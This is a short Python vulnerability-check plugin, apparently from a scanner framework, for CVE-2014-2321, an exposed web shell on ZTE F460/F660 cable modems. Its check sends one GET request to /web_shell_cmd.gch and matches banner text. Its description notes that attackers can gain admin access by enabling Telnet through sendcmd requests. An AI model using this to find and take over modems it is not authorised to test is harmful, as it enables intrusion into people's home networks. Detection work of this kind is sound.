CVE-2014-2321.py

import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''ZTE Cable Modem Web Shell''',
        "description": '''web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.''',
        "severity": "high",
        "references": [
            "https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/", 
            "https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-2321",
            "cwe-id": ""
        },
        "metadata":{
            "vuln-target": "",
            
        },
        "tags": ["iot", "cve", "cve2014", "zte"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)
        path = '/web_shell_cmd.gch'

        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "please input shell command" in resp.text and "ZTE Corporation. All rights reserved" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    except:
        result["success"] = False
    
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url